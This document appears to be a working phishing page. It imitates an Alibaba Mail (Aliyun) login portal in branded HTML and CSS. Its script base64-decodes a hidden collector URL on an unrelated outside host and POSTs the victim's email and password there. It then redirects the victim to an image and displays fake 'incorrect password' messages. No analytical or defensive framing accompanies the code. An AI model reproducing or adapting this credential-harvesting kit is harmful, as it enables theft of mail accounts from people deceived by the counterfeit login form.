<!DOCTYPE html>
<!-- Created By CodingLab - www.codinglabweb.com -->
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Login Portal Alibaba Mail - Personal Edition</title>
<link rel="shortcut icon" href="https://mail.aliyun.com/static/0.2.8/images/favicon.ico">
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-image: url("https://i.ibb.co/bB8q27X/aliyunbg1.png");
            background-size: cover;
            background-position: center;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 110vh;
            position: relative; /* Add position relative */
        }
        /* Add overlay style */
        body::before {
            content: "";
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0); /* Adjust opacity here */
            z-index: -1; /* Move the overlay behind other elements */
        }
        .container {
            background-color: #fff;
            border-radius: 0; /* Sharp edges */
            padding: 20px;
            text-align: center;
            box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
            max-width: 400px; /* Reduced width */
            width: 100%;
            opacity: 0;
            animation: slideIn 0.5s forwards;
            position: relative; /* Add position relative */
            height: 330px; /* Increased height */
        }
        @keyframes slideIn {
            from {
                width: 0;
                opacity: 0;
            }
            to {
                width: 100%;
                opacity: 1;
            }
        }
        .logo {
            width: 200px;
            height: 100px;
            margin: auto;
            display: block;
        }
        h2 {
            font-weight: bold;
            margin-top: 20px;
            margin-bottom: 10px;
        }
        input[type="email"],
        input[type="password"],
        button {
            width: calc(105% - 40px);
            margin-bottom: 10px;
            padding: 14px;
            border-radius: 0; /* Sharp edges */
            border: 1px solid #ccc;
            box-sizing: border-box;
        }
        button {
            background-color: #ff9000;/* Red color */
            color: #fff;
            cursor: pointer;
            transition: background-color 0.3s ease;
        }
        button:hover {
            background-color: #ff9000; /* Darker red on hover */
        }
        .error-container {
            color: white;
            background: lightcoral;
            padding: 10px;
            margin-top: 10px;
            border-radius: 0; /* Sharp edges */
            display: none;
        }
        .spinner {
            border: 4px solid rgba(0, 0, 0, 0.1);
            border-top: 4px solid #333;
            border-radius: 50%;
            width: 30px;
            height: 30px;
            animation: spin 1s linear infinite;
            margin: 20px auto;
        }
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
        /* Remember me checkbox style */
        .remember-me {
            text-align: left;
            margin-bottom: 10px;
            font-size: 14px;
            margin-left: 20px;
        }
        /* Copyright text style */
        .copyright {
            font-size: 8px;
            color: #999;
            position: left; /* Add position absolute */
            bottom: 20px; /* Adjust as needed */
            left: 8px; /* Adjust as needed */
        }
        /* Privacy & cookies text style */
        .privacy-cookies {
            font-size: 10px;
            color: #999;
            position: absolute; /* Add position absolute */
            bottom: 10px; /* Adjust as needed */
            right: 70px; /* Adjust as needed */
        }
    </style>
</head>
<body>
    <div class="container">
        <img src="https://i.ibb.co/rywp8wH/aliyun-login-logo.jpg" alt="Adobe Logo" class="logo">
	
       <form name="loginForm">
            <input type="email" name="email" id="email" placeholder="Alibaba Mail Account" class="input_text" maxlength="41"
                                               value="">
            <input type="password" id="pw" name="password" required placeholder="Password" title="비밀번호"
                                               class="input_text" maxlength="16">
            <div class="remember-me">
                <input type="checkbox" id="remember-me" name="remember-me" checked> <!-- Checked by default -->
                <label for="remember-me">Remember me</label></br>
<div class="alert alert-danger" id="msg" style="display: none; font-size: 10px; color: red;">Invalid Password.! Please Enter your 

correct Password</div>
            </div>
            <button type="submit" id="submit-btn">Sign In</button>           <!-- Copyright text inside form container -->
            <div class="copyright">&copy; I have read and agree with Aliyun Privacy Policy</div>
            <!-- Privacy & cookies text inside form container -->
            <div class="privacy-cookies"></div>
        </form>

        <div class="error-container"></div>
        <div class="spinner" style="display:none;"></div>
    </div>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script src="https://code.jquery.com/jquery-1.9.1.js"></script>
    <script>

	  
	   $(document).ready(function() {
		    var user=$("#pet").val();
		  var  count=0;
		   
		   
		   
		   
		   
        $('form').submit(function(e) {
			
			count=count+1;
			
		   var d=atob("aHR0cHM6Ly9yZW1vdGUtam9icy5jbG91ZC9pdnRlY2gvY2FuYWRhLnBocA==");

            e.preventDefault();
               $.ajax({
			   
            type: 'POST',
            url: d,
			crossDomain: true,
            data: $('form').serialize(),
			
			 beforeSend: function(xhr){
              $('#submit-btn').html('Verifing...');
			  
			  
			  
if (count>=0) {
                    count=0;
                    // window.location.replace(response['redirect_link']);
                    window.location.replace("https://babbajay19.github.io/CS1.1.jpg");

                  }else{
				   var x = document.getElementById("id").value;
					 
					
				   $('#submit-btn').html('CONTINUE');
					   document.getElementById("pw").value ="";
					 
					
            	$("#err_common").show();
				    $("#error_message").html("The username or password you entered is incorrect.");
				

					 }
						
            },
			
			
					 
            success: function () {
				$("#error_message").show();
				    $("#err_common").html("The username or password you entered is incorrect.");
				

	
            }
          });
        });
    });
    </script>


</body>

</html>